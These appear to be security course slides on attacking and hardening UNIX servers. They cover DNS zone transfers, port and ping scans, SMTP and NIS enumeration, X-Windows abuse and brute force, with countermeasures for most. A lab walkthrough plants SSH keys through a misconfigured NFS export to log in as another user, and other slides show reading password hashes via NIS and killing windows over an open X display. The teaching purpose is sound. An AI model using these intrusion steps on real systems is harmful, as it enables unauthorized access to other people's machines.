UNIX Hacking
The most common target for a hacker is to get to user root, which can control everything on a UNIX server.
UNIX hacking include common footprinting and enumeration techniques. Gathering public information Port scanning Various enumeration techniques
These information leads to system compromise.
2
Gathering Public Information
Web sites Internal web sites External web sites
Public FTP server IP address information through whois
database DNS
Server addresses MX records Tools: host, nslookup, dig
google3
DNS Information
4
[root@test ~]# host -l -a miss.comTrying "miss.com";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14233;; flags: qr aa ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:;miss.com. IN AXFR
;; ANSWER SECTION:miss.com. 10800 IN SOA miss.com. admin.miss.com. ...miss.com. 10800 IN NS pentarget.miss.com.miss.com. 10800 IN MX 10 pentarget.miss.com.ns.miss.com. 10800 IN CNAME pentarget.miss.com.pentarget.miss.com. 10800 IN A 192.168.4.3pentest.miss.com. 10800 IN A 192.168.4.2www.miss.com. 10800 IN CNAME pentarget.miss.com.miss.com. 10800 IN SOA miss.com. admin.miss.com. ...
DNS Hardening
DNS configuration can hardened (Bind - /etc/named.conf). Allow query to any clients. Allow transfer only to secondary servers. Allow recursion only to local clients.
5
options { ... allow-query { any; }; allow-transfer { localhost; 192.168.4.4; }; allow-recursion { localhost; 192.168.4.0/24; }; recursion yes; ...};
DNS Hardening
Hardening result:
6
[root@test nfs]# host -l -a miss.comTrying "miss.com"; Transfer failed.Trying "miss.com"Host miss.com not found: 9(NOTAUTH)Received 40 bytes from 192.168.4.3#53 in 1 ms; Transfer failed.
Traceroute
Network topology can be found by using traceroute.
Firewall location may also be located.
8
[bash]$ traceroute example.comtraceroute to example.com (192.168.1.7), 30 hops max, 38 byte packets1 (10.1.1.1) 4.264 ms 4.245 ms 4.226 ms2 (10.2.1.1) 9.155 ms 9.181 ms 9.180 ms3 (192.168.10.90) 9.224 ms 9.183 ms 9.145 ms4 (192.168.10.33) 9.660 ms 9.771 ms 9.737 ms5 (192.168.10.217) 12.654 ms 10.145 ms 9.945 ms6 (192.168.11.173) 10.235 ms 9.968 ms 10.024 ms7 (192.168.12.97) 133.128 ms 77.520 ms 218.464 ms8 (192.168.13.78) 65.065 ms 65.189 ms 65.168 ms9 (192.168.14.252) 64.998 ms 65.021 ms 65.301 ms10 (192.168.100.130) 82.511 ms 66.022 ms 66.17011 www.example.com (192.168.1.7) 82.355 ms 81.644 ms 84.238 ms
Traceroute Countemeasures
You cannot block inbound traceroute from the outside network, since it can be any kind of IP packets.
However, you can block outbound ICMP TTL-exceeded (ICMP type 11), which is the response of the internal machines to the traceroute source.
9
Local Machines
AttackerFW
Any IP packets
ICMP TTL-exceeded
Ping Sweeps
Ping sweep can be done by sending ICMP-echo (type 8) from the outside and wait for ICMP-echo-reply (type 0).
Ping sweep can also be done by using other techniques, such as sending ICMP-info-request (type 15).
Tools: nmap fping hping2
10
Ping Sweeps
11
[root@test static]# ./icmpenumUSAGE: ./icmpenum [opts] [-c class C] [-d dev] [-i 1-3] [-s src] [-t sec] hosts ...-c class C in x.x.x.0 form -i icmp type to send/receive, types include the following: 1 echo/echo reply (default) 2 timestamp request/reply 3 info request/reply 4 mask request/reply -d device to grab local IP or sniff from, default is eth0 -s spoofed source address -t time in seconds to wait for all replies (default 5)[root@test static]# ./icmpenum -i 2 -i eth0 -c 192.168.4.1192.168.4.2 is up192.168.4.3 is up
Port Scanners and OS Detection
Port scanning tools nmap strobe tcp_scan, udp_scan (part of SAINT) netcat (nc)
OS detection tools nmap queso
13
Detecting Port Scanners
There are several tools that can be used to detect port scanning activities. psad scanlogd (TCP only) Snort
Some software can also integrate with firewall, so that further scanning can be prevented.
14
Banner Grabbing
Possible information include Secure shell server software and
protocol version Mail server software
Tools telnet netcat amap vmap
15
Banner Grabbing
16
[root@test static]# telnet 192.168.4.3 22Trying 192.168.4.3...Connected to 192.168.4.3.Escape character is '^]'.SSH-2.0-OpenSSH_5.2
Protocol mismatch.Connection closed by foreign host.
[root@test static]# telnet 192.168.4.3 25220 relay.mut.ac.th ESMTP Sendmail 8.13.8/8.14.2; ...quit221 2.0.0 xxx.xxx.ac.th closing connection
Connection to host lost.
FTP Enumeration An attacker may use any FTP client to scan directory
structure inside an FTP server to check whether you have any wrong permission settings in the server.
Most anonymous FTP server allows password to be any e-mail address.
If a world-writable directory is found, the attacker will have a way to upload (hack)tools to your server and find the way it execute it later.
If the FTP server software has security issues, the attacker may launch an exploit against it.
Successful exploit will give the attacker a user with FTP service privilege.
17
SMTP Enumeration
SMTP server may be used to gain more information about users on the target machine.
SMTP special command like VRFY can be used to confirm valid usernames.
EXPN can be used to expand usernames in a mailing list.
18
SMTP Enumeration
19
[root$]telnet 10.219.100.1 25Trying 10.219.100.1...Connected to 10.219.100.1.Escape character is '^]'.220 mail.example.com ESMTP Sendmail Tue, 15 Jul 2008vrfy root250 root <[email protected]>expn test250 test <[email protected]>expn mailing-list250 .... the whole list of subscribers ... quit221 mail.example.com closing connection
TFTP Enumeration Trivial File Transfer Protocol (TFTP) is a UDP-
based protocol for unauthenticated “quick and dirty” file transfers.
TFTP runs on UDP port 69. TFTP is commonly used to transfer devices
ROM images and configuration backups/restores.
Configuration can have valuable information to the attacker, such as passwords or hashes of the network devices.
You should always block TFTP request from trusted addresses.
20
Finger Enumeration
On old UNIX servers, finger service may be running.
The attacker may get the list of logged-in users, as well as, valid user names.
Finger service is not common in modern UNIX anymore.
21
[root$]finger [email protected][192.168.202.34] Line User Host(s) Idle Location* 2 vty 0 idle 0 192.168.202.14
RPC Enumeration
All RPC-based services must be registered to the RPC server.
Common RPC services include NIS and NFS.
rpcinfo command can be used to enumerate available services, service versions, and open ports.
RPC server itself runs on TCP and UDP port 111.
RPC server service is commonly referred to as rpcbind or portmapper.
22
RPC Enumeration
23
[root@test static]# rpcinfo -p 192.168.4.3 program vers proto port service 100000 4 tcp 111 portmapper 100000 4 udp 111 portmapper 100024 1 udp 50626 status 100024 1 tcp 34440 status 100011 2 udp 875 rquotad 100011 2 tcp 875 rquotad 100021 4 udp 51211 nlockmgr 100021 4 tcp 49851 nlockmgr 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100005 2 udp 47214 mountd 100005 2 tcp 46771 mountd 100005 3 udp 47214 mountd 100005 3 tcp 46771 mountd
R-cmd Enumeration R-commands are used in traditional UNIX to
support remote administration tasks. Authentication is controlled using a config file
called .rhosts in the home directory of the target user.
Common misconfiguration is to put a plus symbol (+) to be in the rhosts file. This allows every machine to remote control the target machine as the specified user.
R-commands include: rexec, rsh, rlogin, rcp. R-commands are not common in modern UNIX.
SSH should be used as replacement.
24
R-cmd Enumeration
25
hammer$ cat .rhostsgryphon.csi.cam.ac.ukoneeye.csi.cam.ac.uk
gryphon$ rlogin hammer.thor Last login: Mon Oct 11 13:10:02 from gryphon.csi.cam.ac.uk Solaris Release 2.5 [hammer] Linux Redhat Release 4.2hammer$
gryphon$ rsh -l rjd4 hammer.thor.cam.ac.uk uname -n hammer.thor.cam.ac.uk
NIS Enumeration
NIS data can be retrieved using ypcat and ypmatch command.
NIS data may be accessed remotely, but the attacker needs to know the NIS domain name.
26
[root@pentarget ~]# nisdomainnamemiss[root@pentarget ~]# ypcat passwdtestnis1:!!:1001:1001::/home/testnis1:/bin/bashtest1:!!:501:501::/home/test1:/bin/bashadmin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash[root@pentarget ~]# ypmatch admin passwdadmin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash[root@pentarget ~]#
Hardening NIS
Configure (/var/log/)securenets configuration files to allow NIS access only from NIS client machines.
Make NIS domain name harder to guess.
Note that NIS domain name can be found easily if you can log into the NIS client machine.
27
NFS Enumeration
NFS exports can be remotely found by using showmount command.
NFS authentication, by default, is checked against IP address of the NFS client machines.
If the address is trusted, any UID supplied by the client will be trusted by the server too.
Any misconfiguration on the NFS exports may lead to system compromise.
nfsshell is another tool to interact with NFS server directly.
28
NFS Attacks
29
[root@pentarget ~]# cat /etc/exports/home *(rw)/mnt pentarget.miss.com(rw)/usr *(ro)
[root@pentest static]# showmount -e 192.168.4.3Export list for 192.168.4.3:/usr */home */mnt pentarget.miss.com
NFS Attacks
30
[root@pentest ~]# mount 192.168.4.3:/home /mnt[root@pentest ~]# ls -l /mnttotal 12drwx------. 26 admin admin 4096 2010-02-18 16:05 admindrwx------. 6 501 501 4096 2010-02-16 15:22 test1[root@pentest ~]# useradd -u 501 hoho[root@pentest ~]# id hohouid=501(hoho) gid=501(hoho) groups=501(hoho)[root@pentest ~]# su - hoho[hoho@pentest test1]$ cd /mnt/test1[hoho@pentest test1]$ mkdir .ssh[hoho@pentest test1]$ cd .ssh[hoho@pentest .ssh]$ cp ~/.ssh/id_rsa.pub authorized_keys[hoho@pentest .ssh]$ chmod 644 authorized_keys[hoho@pentest .ssh]$ chmod 700 .
NFS Attacks
31
[hoho@pentest .ssh]$ ls -latotal 12drwx------. 2 hoho hoho 4096 2010-02-18 17:29 .drwx------. 7 hoho hoho 4096 2010-02-18 17:28 ..-rw-r--r--. 1 hoho hoho 403 2010-02-18 17:29 authorized_keys[hoho@pentest .ssh]$ ssh-agentSSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;SSH_AGENT_PID=2819; export SSH_AGENT_PID;echo Agent pid 2819;[hoho@pentest .ssh]$ SSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;[hoho@pentest .ssh]$ SSH_AGENT_PID=2819; export SSH_AGENT_PID;
NFS Attacks
32
[hoho@pentest .ssh]$ ssh-addEnter passphrase for /home/hoho/.ssh/id_rsa:Identity added: /home/hoho/.ssh/id_rsa (/home/hoho/.ssh/id_rsa)[hoho@pentest .ssh]$ ssh -l test1 192.168.4.3...Last login: Tue Feb 16 15:24:27 2010 from 192.168.4.2[test1@pentarget ~]$ iduid=501(test1) gid=501(test1) groups=501(test1)
Hardening NFS
Only export file systems to trusted machines. Export file systems read-only if possible. Use root ownership of exported files and
directories. Do not export the server's executables. Always use showmount command to double-
check that you configure it securely. Do not allow users to log into the NFS server. Use TCP_Wrappers to block NFS access, if
possible.
33
X-Windows Security
X-Windows allows many privileges to remote access including: Capture keystrokes Kill windows Capture windows Remap keyboard keys
X access control is xhost authentication. Xhost authentication is IP-based. Most users
simple type “xhost +” to allow access. This means that anyone can access the X-
Windows system on the server.
34
X-Windows Security
xscan can be used to scan for X-Windows access on the networks.
xlsclients list all windows on a display xkill kills any window. xwd dumps a screen to a file. xwud displays a image created by xwd.
35
X-Windows Security
36
[testnis1@pentarget ~]$ iduid=1001(testnis1) gid=1001(testnis1) groups=1001(testnis1)[testnis1@pentarget ~]$ xlsclientsxlsclients: unable to open display ""
[admin@pentarget ~]$ xhost +Access control disabled, clients can connect from any host[admin@pentarget ~]$
X-Windows Security
37
[testnis1@pentarget ~]$ xlsclients -display :0.0 –l...Window 0xe00001: Machine: pentarget.miss.com Name: Terminal Icon Name: gnome-terminal Command: gnome-terminal Instance/Class: gnome-terminal/Gnome-terminalWindow 0x4200001: Machine: pentarget.miss.com Name: Firefox Icon Name: firefox Command: firefox Instance/Class: firefox/Firefox...[testnis1@pentarget ~]$ xkill -display :0.0 -id 0x4200001xkill: killing creator of resource 0x4200001
Vulnerability Mapping
After gaining security information on the server, a hacker can manually map it to get potential vulnerabilities.
This process is called vulnerability mapping which can be done by: Manually map gathered information to find
potential vulnerabilities. Public and proof-of-concept exploits can be
used to test whether vulnerabilities can successfully exploited.
Use vulnerability scanners to find potential exploits, but this is noisy.
38
Vulnerability Mapping
Script kiddies simply skip vulnerability mapping process, and shoot everything at the target.
It’s common to get windows exploits targeting UNIX/Linux servers.
39
Vulnerability Mapping
Common vulnerability mapping process include: Perform network reconnaissance against the
target system. Map attributes such as operating system,
architecture, and specific versions of listening services to known vulnerabilities and exploits.
Perform target acquisition by identifying and selecting key systems.
Enumerate and prioritize potential points of entry.
40
System Access
There are two type of gaining access to a UNIX/Linux server. Remote access is done by gaining
access via the network or communication channel.
Local access is done by having actual command shell and escalating to a higher privileges. This is usually called privilege escalation attacks.
41
System Access
Remote access and local access are related.
Attackers remotely exploit a vulnerability in a listening service and then gaining local shell access.
Once shell access is obtained, the attackers are considered to be local on the system.
Then, attackers escalate their local privileges to root.
42
Brute-Force Attack
Password brute-force attack can be conducted on several services including: telnet ftp R-commands Secure shell (SSH) POP3, IMAP HTTP, HTTPS CVS/SVN
43
Brute-Force Attack Countermeasures
Use strong passwords by enforcing password policy.
This can be done setting configurations and additional software Cracklib System configurations
/etc/security/login.conf PAM
45
Brute-Force Attack Countermeasures
In addition to general password strength recommendations, Log multiple authentication failures. Implement account lockout where
possible (beware of DoS attack). Disable unused services. Use stronger authentication when
possible, for example One-time password (OTP). public key authentication. Security tokens.
46
Attacks from Bad Coding
Attacks from bad coding behavior include: Buffer overflow attacks Format string attacks Weak input validation Integer overflow and integer sign
attacks Dangling pointer attacks
47
Countermeasures
Always update software with security patches.
Beware of obsolete software. Use secure coding practices. Conduct software audits regularly. Disable unused services.
48
Stack Protection
Administrators may disable stack execution to lower chances of getting attacked by stack overflow techniques.
This can be done by modify settings in proper (OS-dependent) configuration files. Solaris: /etc/system Linux: depends on distributions
This does not prevent other similar techniques, such as heap overflow.
49
Generic UNIX Protection For all UNIX machines, following protection
measures can be done: Separate networks for UNIX servers from clients. Using TCP_Wrappers. Enable host-based firewall. Consider what traffic should pass firewall.
RPC traffic can remain inside DMZ. Enforce password policy. Do not share admin accounts. Centralize logs to a log server (syslog). Disable root login (except for recovery). Implement sudo.
Letting users perform tasks as root or privileged user.
50